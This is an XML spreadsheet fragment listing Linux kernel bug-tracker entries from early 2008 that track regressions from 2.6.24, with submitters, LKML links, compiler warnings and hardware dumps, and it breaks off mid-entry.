    <t>2008-02-13 05:28 UTC</t>
  </si>
  <si>
    <t>2008-02-14 09:53 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.24-git2: Oracle 11g VKTM process enters R state on startup and is unkillable [still broken in 2.6.25-rc1] Submitter : "Alessandro Suardi" &lt;alessandro.suardi@gmail.com&gt; Date : 2008-02-11 17:20 References : http://lkml.org/lkml/2008/2/11/235 Handled-By : Peter Zijlstra &lt;a.p.zijlstra@chello.nl&gt; Patch : http://lkml.org/lkml/2008/2/11/407 Patch : http://lkml.org/lkml/2008/2/11/433 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[2.6.25-rc1] Strange regression with CONFIG_HZ_300=y</t>
  </si>
  <si>
    <t>2008-02-13 05:34 UTC</t>
  </si>
  <si>
    <t>2008-02-17 15:09 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.25-rc1] Strange regression with CONFIG_HZ_300=y Submitter : "Carlos R. Mafra" &lt;crmafra@gmail.com&gt; Date : 2008-02-11 14:41 References : http://lkml.org/lkml/2008/2/11/161 Handled-By : "H. Peter Anvin" &lt;hpa@zytor.com&gt; Patch : http://lkml.org/lkml/2008/2/12/351 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>iwl3945: not only it periodically dies, it also BUG()s</t>
  </si>
  <si>
    <t>2.5.25-rc0</t>
  </si>
  <si>
    <t>2008-02-13 06:02 UTC</t>
  </si>
  <si>
    <t>2008-03-14 12:05 UTC</t>
  </si>
  <si>
    <t>Subject : ipw3945: not only it periodically dies, it also BUG()s Submitter : Pavel Machek &lt;pavel@ucw.cz&gt; Date : 2008-02-05 22:44 References : http://lkml.org/lkml/2008/2/5/453 Handled-By : "Chatre, Reinette" &lt;reinette.chatre@intel.com&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>snd-indigoio does not load properly, fails with error -16</t>
  </si>
  <si>
    <t>2008-02-13 08:09 UTC</t>
  </si>
  <si>
    <t>Antek Grzymala</t>
  </si>
  <si>
    <t>2008-04-19 15:19 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Unknown Earliest failing kernel version: 2.6.24 Distribution: Gentoo Hardware Environment: Echo Indigo-IO audio card CardBus bridge: Texas Instruments PCIxx12 Cardbus Controller Problem Description: I cannot use my Echo IndigoIO PCMCIA card, when I insert the card and my system tries to load the indigoio module I get the following errors (quoted from my kernel log): ### Using the in-kernel 1.0.15 driver (kernel 2.6.24.1, with some debug options turned on): pccard: CardBus card inserted into slot 0 ALSA sound/pci/echoaudio/echoaudio.c:2001: Echoaudio driver starting... PCI: Enabling device 0000:03:00.0 (0000 -&gt; 0002) ACPI: PCI Interrupt 0000:03:00.0[A] -&gt; GSI 18 (level, low) -&gt; IRQ 19 ALSA sound/pci/echoaudio/echoaudio.c:1918: chip=f73fe000 ALSA sound/pci/echoaudio/echoaudio.c:1854: Stop DSP... ALSA sound/pci/echoaudio/echoaudio.c:1859: Stopped. ALSA sound/pci/echoaudio/echoaudio.c:1870: MMIO freed. ACPI: PCI interrupt for device 0000:03:00.0 disabled ALSA sound/pci/echoaudio/echoaudio.c:1876: Chip freed. ALSA sound/pci/echoaudio/echoaudio.c:1934: cannot get memory region Echoaudio Indigo IO: probe of 0000:03:00.0 failed with error -16 ### using driver from a custom 1.0.16rc2 package (built against the same 2.6.24.1 kernel): pccard: CardBus card inserted into slot 0 PCI: Enabling device 0000:03:00.0 (0000 -&gt; 0002) ACPI: PCI Interrupt 0000:03:00.0[A] -&gt; GSI 18 (level, low) -&gt; IRQ 19 ACPI: PCI interrupt for device 0000:03:00.0 disabled ALSA /var/tmp/portage/media-sound/alsa-driver-1.0.16_rc2/work/alsa-driver-1.0.16rc2/pci/echoaudio/echoaudio.c:1935: cannot get memory region Echoaudio Indigo IO: probe of 0000:03:00.0 failed with error -16 ### This bug has already been filed by me in the Alsa bugtracking system, but since it exhibits zero activity I though it will be more appropriate to file it here (ALSA URL: https://bugtrack.alsa-project.org/alsa-bug/view.php?id=3743).</t>
  </si>
  <si>
    <t>BedOS_Gui</t>
  </si>
  <si>
    <t>parisc compile error</t>
  </si>
  <si>
    <t>2008-02-13 12:08 UTC</t>
  </si>
  <si>
    <t>2008-03-16 12:45 UTC</t>
  </si>
  <si>
    <t>Subject : parisc compile error Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; Date : 2008-02-08 01:12 References : http://lkml.org/lkml/2008/2/7/572 Caused-By : Christoph Lameter &lt;clameter@sgi.com&gt; commit 9e2779fa281cfda13ac060753d674bbcaa23367e Handled-By : Kyle McMartin &lt;kyle@mcmartin.ca&gt;</t>
  </si>
  <si>
    <t>[2.6.25-rc0 System no longer powers off after shutdown</t>
  </si>
  <si>
    <t>2.6.25-rc0</t>
  </si>
  <si>
    <t>2008-02-13 12:54 UTC</t>
  </si>
  <si>
    <t>2008-02-23 13:29 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.25-rc0 System no longer powers off after shutdown Submitter : Frans Pop &lt;elendil@planet.nl&gt; Date : 2008-02-11 16:23 References : http://lkml.org/lkml/2008/2/11/198 Handled-By : Greg KH &lt;gregkh@suse.de&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>mount: could not  find filesystem</t>
  </si>
  <si>
    <t>2.6.25-git0</t>
  </si>
  <si>
    <t>2008-02-13 14:07 UTC</t>
  </si>
  <si>
    <t>2008-03-31 04:40 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.26-git0: IDE oops during boot Submitter : Kamalesh Babulal &lt;kamalesh@linux.vnet.ibm.com&gt; Date : 2008-02-12 14:34 References : http://lkml.org/lkml/2008/2/12/91 Handled-By : Bartlomiej Zolnierkiewicz &lt;bzolnier@gmail.com&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>symlink.c compilation warning on 2.6.24.2 &amp; 2..25-rc1-git2</t>
  </si>
  <si>
    <t>2.6.24.2 &amp; 2.6.25-rc1-git2</t>
  </si>
  <si>
    <t>2008-02-13 14:12 UTC</t>
  </si>
  <si>
    <t>2008-04-22 12:26 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: gentoo ~amd64 Hardware Environment: amd64 X2 Software Environment: gcc-4.2.2 Problem Description: When building above kernels this warning occurs in fs/autofs4 CC fs/autofs4/symlink.o fs/autofs4/symlink.c: In function ‘autofs4_follow_link’: fs/autofs4/symlink.c:18: attention : passing argument 2 of ‘nd_set_link’ discards qualifiers from pointer target type Steps to reproduce:</t>
  </si>
  <si>
    <t>pmf.c compilation warnings on 2.6.24.2 &amp; 2.6.25-rc1-git2</t>
  </si>
  <si>
    <t>2008-02-13 14:22 UTC</t>
  </si>
  <si>
    <t>2009-03-24 04:41 UTC</t>
  </si>
  <si>
    <t>kernel BUG at snapshot.c:464, caused by pfn_valid() lying</t>
  </si>
  <si>
    <t>commit 74dfd666de861c97d47bdbd892f6d21b801d0247</t>
  </si>
  <si>
    <t>2008-02-13 14:35 UTC</t>
  </si>
  <si>
    <t>2008-03-13 15:45 UTC</t>
  </si>
  <si>
    <t>Subject : kernel BUG at kernel/power/snapshot.c:464! Submitter : Jeff Mahoney &lt;jeffm@suse.com&gt; Date : 2008-02-08 20:03 References : http://lkml.org/lkml/2008/2/8/331 Handled-By : "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>ess.c compilation warnings on 2.6.24.2 &amp; 2.6.25-rc1-git2</t>
  </si>
  <si>
    <t>2008-02-13 14:36 UTC</t>
  </si>
  <si>
    <t>2008-09-23 04:08 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: gentoo ~amd64 Hardware Environment: amd64 X2 Software Environment: gcc-4.2.2 Problem Description: When building above kernels for drivers/net/skfp these compilation warnings occurs in ess.c : CC drivers/net/skfp/ess.o drivers/net/skfp/ess.c: In function ‘ess_send_response’: drivers/net/skfp/ess.c:513: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/ess.c: In function ‘ess_send_alc_req’: drivers/net/skfp/ess.c:609: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/ess.c:639: attention : transtypage d'un pointeur vers un entier de taille différente Steps to reproduce:</t>
  </si>
  <si>
    <t>2.6.24-git15 Keyboard Issue?</t>
  </si>
  <si>
    <t>2.6.24-git15</t>
  </si>
  <si>
    <t>2008-02-13 14:47 UTC</t>
  </si>
  <si>
    <t>2008-03-28 15:32 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.24-git15 Keyboard Issue? Submitter : Chris Holvenstot &lt;cholvenstot@comcast.net&gt; Date : 2008-02-06 14:02 References : http://lkml.org/lkml/2008/2/6/100 Handled-By : Thomas Gleixner &lt;tglx@linutronix.de&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline or the report is rejected.</t>
  </si>
  <si>
    <t>ohci-hcd.c compilation warning on 2.6.24.2 &amp; 2.6.25-rc1-git2</t>
  </si>
  <si>
    <t>2008-02-13 14:49 UTC</t>
  </si>
  <si>
    <t>2008-04-21 23:38 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: gentoo ~amd64 Hardware Environment: amd64 X2 Software Environment: gcc-4.2.2 Problem Description: When building above kernels this compilation warning occurs for drivers/usb/host CC drivers/usb/host/ohci-hcd.o In file included from drivers/usb/host/ohci-hcd.c:973: drivers/usb/host/ohci-pci.c: In function ‘ohci_pci_start’: drivers/usb/host/ohci-pci.c:222: attention : unused variable ‘pdev’ Steps to reproduce:</t>
  </si>
  <si>
    <t>My mm-mystery-crash has now sneaked into mainline</t>
  </si>
  <si>
    <t>2008-02-13 15:23 UTC</t>
  </si>
  <si>
    <t>2008-02-19 15:08 UTC</t>
  </si>
  <si>
    <t>Subject : My mm-mystery-crash has now sneaked into mainline Submitter : "Torsten Kaiser" &lt;just.for.lkml@googlemail.com&gt; Date : 2008-02-11 22:46 References : http://lkml.org/lkml/2008/2/11/424 Handled-By : Stefan Richter &lt;stefanr@s5r6.in-berlin.de&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline or the report is rejected.</t>
  </si>
  <si>
    <t>REGRESSION: x86 vDSO: remove vdso-syms.o</t>
  </si>
  <si>
    <t>2008-02-13 15:35 UTC</t>
  </si>
  <si>
    <t>2008-02-14 09:47 UTC</t>
  </si>
  <si>
    <t>Subject : REGRESSION: x86 vDSO: remove vdso-syms.o Submitter : Priit Laes &lt;plaes@plaes.org&gt; Date : 2008-02-11 23:30 References : http://lkml.org/lkml/2008/2/11/443 Handled-By : Roland McGrath &lt;roland@redhat.com&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline or the report is rejected.</t>
  </si>
  <si>
    <t>[REGRESSION] 2.6.25-rc1 does not boot on Alpha</t>
  </si>
  <si>
    <t>2008-02-13 16:01 UTC</t>
  </si>
  <si>
    <t>2008-02-17 04:40 UTC</t>
  </si>
  <si>
    <t>Subject : [REGRESSION] 2.6.25-rc1 does not boot on Alpha Submitter : Bob Tracy &lt;rct@frus.com&gt; Date : 2008-02-13 06:29 References : http://lkml.org/lkml/2008/2/13/17 Handled-By : Peter Zijlstra &lt;a.p.zijlstra@chello.nl&gt; Patch : http://lkml.org/lkml/2008/1/28/100 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.25-rc1: volanoMark regression</t>
  </si>
  <si>
    <t>2008-02-13 16:08 UTC</t>
  </si>
  <si>
    <t>2009-03-24 04:42 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.25-rc1: volanoMark 45% regression Submitter : "Zhang, Yanmin" &lt;yanmin_zhang@linux.intel.com&gt; Date : 2008-02-13 10:30 References : http://lkml.org/lkml/2008/2/13/128 Handled-By : Srivatsa Vaddagiri &lt;vatsa@linux.vnet.ibm.com&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[build bug] sound/drivers/opl3/opl3_synth.c</t>
  </si>
  <si>
    <t>2008-02-13 16:14 UTC</t>
  </si>
  <si>
    <t>2008-02-24 16:09 UTC</t>
  </si>
  <si>
    <t>Subject : [build bug] sound/drivers/opl3/opl3_synth.c Submitter : Ingo Molnar &lt;mingo@elte.hu&gt; Date : 2008-02-01 11:17 References : http://lkml.org/lkml/2008/2/1/140 Handled-By : Takashi Iwai &lt;tiwai@suse.de&gt; Patch : http://lkml.org/lkml/2008/2/1/152 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.25-rc1 on Sun Ultra 40- HPET clocksource which causes it to hang</t>
  </si>
  <si>
    <t>2008-02-13 16:18 UTC</t>
  </si>
  <si>
    <t>2008-04-06 13:48 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.25-rc1 on Sun Ultra 40 Submitter : Jasper Bryant-Greene &lt;jasper@unix.geek.nz&gt; Date : 2008-02-13 12:25 References : http://lkml.org/lkml/2008/2/13/181 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline or the report is rejected.</t>
  </si>
  <si>
    <t>print_vma_addr possible deadlock (was Re: Jeste jeden bug)</t>
  </si>
  <si>
    <t>commit 03252919</t>
  </si>
  <si>
    <t>2008-02-13 16:36 UTC</t>
  </si>
  <si>
    <t>2008-02-17 04:46 UTC</t>
  </si>
  <si>
    <t>Subject : print_vma_addr possible deadlock (was Re: Jeste jeden bug) Submitter : "Zdenek Kabelac" &lt;zdenek.kabelac@gmail.com&gt; Date : 2008-02-13 17:52 References : http://lkml.org/lkml/2008/2/13/352 Handled-By : Ingo Molnar &lt;mingo@elte.hu&gt; Patch : http://lkml.org/lkml/2008/2/13/459 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline</t>
  </si>
  <si>
    <t>2.6.25-rc1 panics on boot</t>
  </si>
  <si>
    <t>2008-02-13 16:41 UTC</t>
  </si>
  <si>
    <t>2008-02-22 22:00 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.25-rc1 panics on boot Submitter : Dhaval Giani &lt;dhaval@linux.vnet.ibm.com&gt; Date : 2008-02-13 18:03 References : http://lkml.org/lkml/2008/2/13/363 Handled-By : Chris Snook &lt;csnook@redhat.com&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>PROBLEM: 2.6.25-rc1-git2 freezes when accessing external USB hard disk (ehci-hcd)</t>
  </si>
  <si>
    <t>2.6.25-rc1-git2</t>
  </si>
  <si>
    <t>2008-02-13 16:48 UTC</t>
  </si>
  <si>
    <t>2008-03-21 18:57 UTC</t>
  </si>
  <si>
    <t>Subject : PROBLEM: 2.6.25-rc1-git2 freezes when accessing external USB hard disk (ehci-hcd) Submitter : Linas Žvirblis &lt;0x0007@gmail.com&gt; Date : 2008-02-13 22:38 References : http://lkml.org/lkml/2008/2/13/566 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline or the report is rejected.</t>
  </si>
  <si>
    <t>problem with starting 2.6.25-rc1 and latest git</t>
  </si>
  <si>
    <t>2008-02-13 16:51 UTC</t>
  </si>
  <si>
    <t>2008-03-17 12:30 UTC</t>
  </si>
  <si>
    <t>Rusty Russell</t>
  </si>
  <si>
    <t>Subject : problem with starting 2.5.25-rc1 and latest git Submitter : Mariusz Kozlowski &lt;m.kozlowski@tuxland.pl&gt; Date : 2008-02-13 23:16 References : http://lkml.org/lkml/2008/2/13/587 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>fix module_update_markers() compile error</t>
  </si>
  <si>
    <t>2.6.25-rc1-git</t>
  </si>
  <si>
    <t>2008-02-13 17:16 UTC</t>
  </si>
  <si>
    <t>2008-02-17 09:33 UTC</t>
  </si>
  <si>
    <t>Subject : fix module_update_markers() compile error Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/2/13/714 Caused-By : Mathieu Desnoyers &lt;mathieu.desnoyers@polymtl.ca&gt; commit fb40bd78b0f91b274879cf5db8facd1e04b6052e Handled-By : Adrian Bunk &lt;bunk@kernel.org&gt; Patch : http://lkml.org/lkml/2008/2/13/714</t>
  </si>
  <si>
    <t>b43 driver cannot associate with AP</t>
  </si>
  <si>
    <t>2.6.24 and wireless-2.6</t>
  </si>
  <si>
    <t>2008-02-13 17:42 UTC</t>
  </si>
  <si>
    <t>2008-04-20 09:07 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.23 (bcm43xx driver) Earliest failing kernel version: 2.6.24 Distribution: Gentoo Hardware Environment: x86_64 Software Environment: Problem Description: I am unable to associate with an AP, either manually with iwconfig or wpa_supplicant. This happens with the b43 driver under both 2.6.24 and wireless-2.6 everything branch as of commit d86916b7d36c4f0db8634fcc17fe2d747b317f17. My wireless card is: I have the following card: 02:07.0 Network controller: Broadcom Corporation BCM4306 802.11b/g Wireless LAN Controller (rev 03) Subsystem: Linksys Unknown device 0013 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 Interrupt: pin A routed to IRQ 17 Region 0: Memory at fdffc000 (32-bit, non-prefetchable) [size=8K] Kernel driver in use: bcm43xx Kernel modules: bcm43xx 00: e4 14 20 43 06 00 00 00 03 00 80 02 00 40 00 00 10: 00 c0 ff fd 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 37 17 13 00 30: 00 00 00 00 00 00 00 00 00 00 00 00 05 01 00 00 Attached is the dmesg and wpa_supplicant log when association is attempted</t>
  </si>
  <si>
    <t>exregion.c compilation warning on 2.6.25-rc1-git3</t>
  </si>
  <si>
    <t>2.6.25-rc1-git3</t>
  </si>
  <si>
    <t>2008-02-14 01:45 UTC</t>
  </si>
  <si>
    <t>2008-02-22 22:01 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25-rc1-git2 Earliest failing kernel version: Distribution: gentoo ~amd64 Hardware Environment: amd64 X2 Software Environment: gcc-4.2.2 Problem Description: When building above kernel this compilation warning occurs for drivers/acpi/executer CC drivers/acpi/executer/exregion.o drivers/acpi/executer/exregion.c: In function ‘acpi_ex_pci_config_space_handler’: drivers/acpi/executer/exregion.c:369: attention : passing argument 3 of ‘acpi_os_read_pci_configuration’ from incompatible pointer type Steps to reproduce:</t>
  </si>
  <si>
    <t>i386: PAE kernel memory leak on SMP systems</t>
  </si>
  <si>
    <t>2.6.22.18</t>
  </si>
  <si>
    <t>2008-02-14 06:11 UTC</t>
  </si>
  <si>
    <t>2008-03-26 13:31 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: (not known). Earliest failing kernel version: fails with both 2.6.22.12 and 2.6.22.18. Distribution: Ubuntu 7.10 server. Hardware Environment: server with 16GB RAM and 8 CPU's (Intel Xeon E5320). Software Environment: Ubuntu 7.10 server. Problem Description: The available memory steadily decreases when polling for the VirtualBox status. This problem occurs with a 32-bit kernel when CONFIG_HIGHMEM64G and CONFIG_PAE are enabled. This problem does not occur when CONFIG_HIGHMEM64G is disabled. This problem does not occur on the same hardware with a 64-bit kernel. Steps to reproduce: 1. Make sure that the VirtualBox software is installed: apt-get -y install virtualbox 2. Make sure that the VirtualBox kernel driver is NOT loaded: rmmod vboxdrv 3. Start the following command to observe the available memory (do NOT trust free or top -- these tools do not take reclaimable slab memory into account): while true; do /usr/bin/awk &lt;/proc/meminfo '/^MemTotal/{t=$2}/^MemFree/{f=$2}/^Buffers:/{b=$2}/^Cached:/{c=$2}/^SReclaimable:/{sr=$2}''END{print "Total: " t " KB, in use: " t-f-b-c-sr ", free: " f+b+c+sr " KB."}'; sleep 60; done 4. In a second shell, run the following command: for ((i=0;i&lt;1000;i++)); do LD_LIBRARY_PATH=/usr/lib/virtualbox /usr/lib/virtualbox/VBoxManage list vms &gt;/dev/null; done</t>
  </si>
  <si>
    <t>2.6.24-git: kmap_atomic() WARN_ON()</t>
  </si>
  <si>
    <t>2008-02-14 09:41 UTC</t>
  </si>
  <si>
    <t>2008-03-10 17:52 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.24-git: kmap_atomic() WARN_ON() Submitter : Thomas Gleixner &lt;tglx@linutronix.de&gt; Date : 2008-02-07 00:58 References : http://lkml.org/lkml/2008/2/6/451 References : http://lkml.org/lkml/2007/1/14/38 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>atiixp ide timeouts</t>
  </si>
  <si>
    <t>2008-02-14 16:17 UTC</t>
  </si>
  <si>
    <t>Honza Fikar</t>
  </si>
  <si>
    <t>2008-12-04 06:41 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.23 Earliest failing kernel version:2.6.24 Distribution:gentoo Hardware Environment:Acer Aspire 5021 Software Environment: Problem Description: After some hours of uptime I can find this in dmesg and dma of my harddrive is switched off: ... hda: irq timeout: status=0xd0 { Busy } hda: irq timeout: status=0xd0 { Busy } hda: status timeout: status=0xd0 { Busy } hda: DMA disabled ... I can switch it back with hdparm -d1 /dev/hda, but after some hours the same thing happens. Steps to reproduce: just wait, the attached dmesg contains 26 ide0 resets during 17 hours uptime lspci -v: 00:00.0 Host bridge: ATI Technologies Inc RS480 Host Bridge (rev 01) Subsystem: Acer Incorporated [ALI] Aspire 5024WLMMi Flags: bus master, 66MHz, medium devsel, latency 64 00:02.0 PCI bridge: ATI Technologies Inc RS480 PCI-X Root Port (prog-if 00 [Normal decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 I/O behind bridge: 00009000-00009fff Memory behind bridge: c0100000-c01fffff Prefetchable memory behind bridge: c8000000-cfffffff Capabilities: [50] Power Management version 3 Capabilities: [58] Express Root Port (Slot-), MSI 00 Capabilities: [80] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable- Capabilities: [b0] Subsystem: ATI Technologies Inc Unknown device 5950 Capabilities: [b8] HyperTransport: MSI Mapping Enable+ Fixed+ 00:06.0 PCI bridge: ATI Technologies Inc RS480 PCI Bridge (prog-if 00 [Normal decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=09, subordinate=09, sec-latency=0 Capabilities: [50] Power Management version 3 Capabilities: [58] Express Root Port (Slot-), MSI 00 Capabilities: [80] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable- Capabilities: [b0] Subsystem: ATI Technologies Inc Unknown device 5950 Capabilities: [b8] HyperTransport: MSI Mapping Enable+ Fixed+ 00:07.0 PCI bridge: ATI Technologies Inc RS480 PCI Bridge (prog-if 00 [Normal decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=04, subordinate=05, sec-latency=0 Capabilities: [50] Power Management version 3 Capabilities: [58] Express Root Port (Slot-), MSI 00 Capabilities: [80] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable- Capabilities: [b0] Subsystem: ATI Technologies Inc Unknown device 5950 Capabilities: [b8] HyperTransport: MSI Mapping Enable+ Fixed+ 00:13.0 USB Controller: ATI Technologies Inc IXP SB400 USB Host Controller (prog-if 10 [OHCI]) Subsystem: Acer Incorporated [ALI] Unknown device 0080 Flags: bus master, 66MHz, medium devsel, latency 64, IRQ 11 Memory at c0000000 (32-bit, non-prefetchable) [size=4K] Capabilities: [d0] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable- 00:13.1 USB Controller: ATI Technologies Inc IXP SB400 USB Host Controller (prog-if 10 [OHCI]) Subsystem: Acer Incorporated [ALI] Aspire 5024WLMMi Flags: bus master, 66MHz, medium devsel, latency 64, IRQ 11 Memory at c0001000 (32-bit, non-prefetchable) [size=4K] Capabilities: [d0] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable- 00:13.2 USB Controller: ATI Technologies Inc IXP SB400 USB2 Host Controller (prog-if 20 [EHCI]) Subsystem: Acer Incorporated [ALI] Aspire 5024WLMMi Flags: 66MHz, medium devsel, IRQ 11 Memory at c0002000 (32-bit, non-prefetchable) [size=4K] Capabilities: [dc] Power Management version 2 Capabilities: [d0] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable- 00:14.0 SMBus: ATI Technologies Inc IXP SB400 SMBus Controller (rev 11) Subsystem: Acer Incorporated [ALI] Aspire 5024WLMMi Flags: 66MHz, medium devsel I/O ports at 8400 [size=16] Memory at c0003000 (32-bit, non-prefetchable) [size=1K] Capabilities: [b0] HyperTransport: MSI Mapping Enable- Fixed+ 00:14.1 IDE interface: ATI Technologies Inc Standard Dual Channel PCI IDE Controller (prog-if 8a [Master SecP PriP]) Subsystem: Acer Incorporated [ALI] Aspire 5024WLMMi Flags: bus master, 66MHz, medium devsel, latency 0, IRQ 16 I/O ports at 01f0 [size=8] I/O ports at 03f4 [size=1] I/O ports at 0170 [size=8] I/O ports at 0374 [size=1] I/O ports at 8410 [size=16] Capabilities: [70] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable- 00:14.3 ISA bridge: ATI Technologies Inc IXP SB400 PCI-ISA Bridge Subsystem: Acer Incorporated [ALI] Aspire 5024WLMi Flags: bus master, 66MHz, medium devsel, latency 0 00:14.4 PCI bridge: ATI Technologies Inc IXP SB400 PCI-PCI Bridge (prog-if 01 [Subtractive decode]) Flags: bus master, 66MHz, medium devsel, latency 64 Bus: primary=00, secondary=06, subordinate=06, sec-latency=64 I/O behind bridge: 0000a000-0000afff Memory behind bridge: c0200000-c02fffff 00:14.5 Multimedia audio controller: ATI Technologies Inc IXP SB400 AC'97 Audio Controller (rev 02) Subsystem: Acer Incorporated [ALI] Aspire 5024WLMMi Flags: bus master, 66MHz, slow devsel, latency 64, IRQ 17 Memory at c0003400 (32-bit, non-prefetchable) [size=256] Capabilities: [40] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable- 00:14.6 Modem: ATI Technologies Inc SB400 AC'97 Modem Controller (rev 02) (prog-if 00 [Generic]) Subsystem: Acer Incorporated [ALI] Aspire 5024WLMMi Flags: bus master, 66MHz, slow devsel, latency 64, IRQ 11 Memory at c0003800 (32-bit, non-prefetchable) [size=256] Capabilities: [40] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable- 00:18.0 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] HyperTransport Technology Configuration Flags: fast devsel Capabilities: [80] HyperTransport: Host or Secondary Interface 00:18.1 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Address Map Flags: fast devsel 00:18.2 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] DRAM Controller Flags: fast devsel 00:18.3 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Miscellaneous Control Flags: fast devsel 01:00.0 VGA compatible controller: ATI Technologies Inc Radeon Mobility X700 (PCIE) (prog-if 00 [VGA]) Subsystem: Acer Incorporated [ALI] Aspire 5024WLMi Flags: bus master, fast devsel, latency 0, IRQ 18 Memory at c8000000 (32-bit, prefetchable) [size=128M] I/O ports at 9000 [size=256] Memory at c0100000 (32-bit, non-prefetchable) [size=64K] [virtual] Expansion ROM at c0120000 [disabled] [size=128K] Capabilities: [50] Power Management version 2 Capabilities: [58] Express Endpoint, MSI 00 Capabilities: [80] Message Signalled Interrupts: Mask- 64bit+ Queue=0/0 Enable- 06:05.0 Network controller: Broadcom Corporation BCM4318 [AirForce One 54g] 802.11g Wireless LAN Controller (rev 02) Subsystem: AMBIT Microsystem Corp. Aspire 3022WLMi, 5024WLMi, 5020 Flags: bus master, fast devsel, latency 64, IRQ 21 Memory at c0204000 (32-bit, non-prefetchable) [size=8K] 06:06.0 CardBus bridge: Texas Instruments PCIxx21/x515 Cardbus Controller Subsystem: Acer Incorporated [ALI] Aspire 5024WLMi Flags: bus master, medium devsel, latency 64, IRQ 20 Memory at c020a000 (32-bit, non-prefetchable) [size=4K] Bus: primary=06, secondary=07, subordinate=08, sec-latency=176 Memory window 0: 60000000-63fff000 (prefetchable) Memory window 1: 64000000-67fff000 (prefetchable) I/O window 0: 0000a400-0000a4ff I/O window 1: 0000a800-0000a8ff 16-bit legacy interface ports at 0001 06:06.2 FireWire (IEEE 1394): Texas Instruments OHCI Compliant IEEE 1394 Host Controller (prog-if 10 [OHCI]) Subsystem: Acer Incorporated [ALI] Aspire 5024WLMi Flags: bus master, medium devsel, latency 64, IRQ 22 Memory at c0208000 (32-bit, non-prefetchable) [size=2K] Memory at c0200000 (32-bit, non-prefetchable) [size=16K] Capabilities: [44] Power Management version 2 06:06.3 Mass storage controller: Texas Instruments PCIxx21 Integrated FlashMedia Controller Subsystem: Acer Incorporated [ALI] Aspire 5024WLMi Flags: bus master, medium devsel, latency 64, IRQ 11 Memory at c0206000 (32-bit, non-prefetchable) [size=8K] Capabilities: [44] Power Management version 2 06:06.4 Generic system peripheral [0805]: Texas Instruments PCI6411/6421/6611/6621/7411/7421/7611/7621 Secure Digital Controller Subsystem: Acer 